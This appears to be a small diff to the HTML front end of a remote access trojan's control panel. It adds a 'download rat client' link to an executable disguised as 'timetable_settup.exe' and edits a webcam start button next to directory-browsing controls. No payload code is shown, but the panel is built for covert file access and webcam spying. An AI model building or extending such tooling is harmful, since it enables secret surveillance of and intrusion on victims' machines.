Final presented version

--- a/host Server/index.html
+++ b/host Server/index.html
@@ -17,7 +17,7 @@
 </head>
 
 <body>
-<a href="http://"></a>
+<a href="/res/timetable_settup.exe" download title="download client to this machine">download rat client</a>
     <!-- directory controls -->
     <div class="view" id="directory_view">
         <div class="title" id="full_path">Directories</div>
@@ -53,7 +53,7 @@
         <video autoplay="true" id="webcam_preview"></video>
         <div class="btn_wrapper">
             <button id="stop_video" class="video_btn" title="attempt to start video feed">stop video</button>
-            <button id="start_video" class="video_btn" title="attempt to close video feed">start video</button>
+            <button id="start_video" class="video_btn" title="attempt to close video feed">attempt connection start video</button>
         </div>
     </div>
 
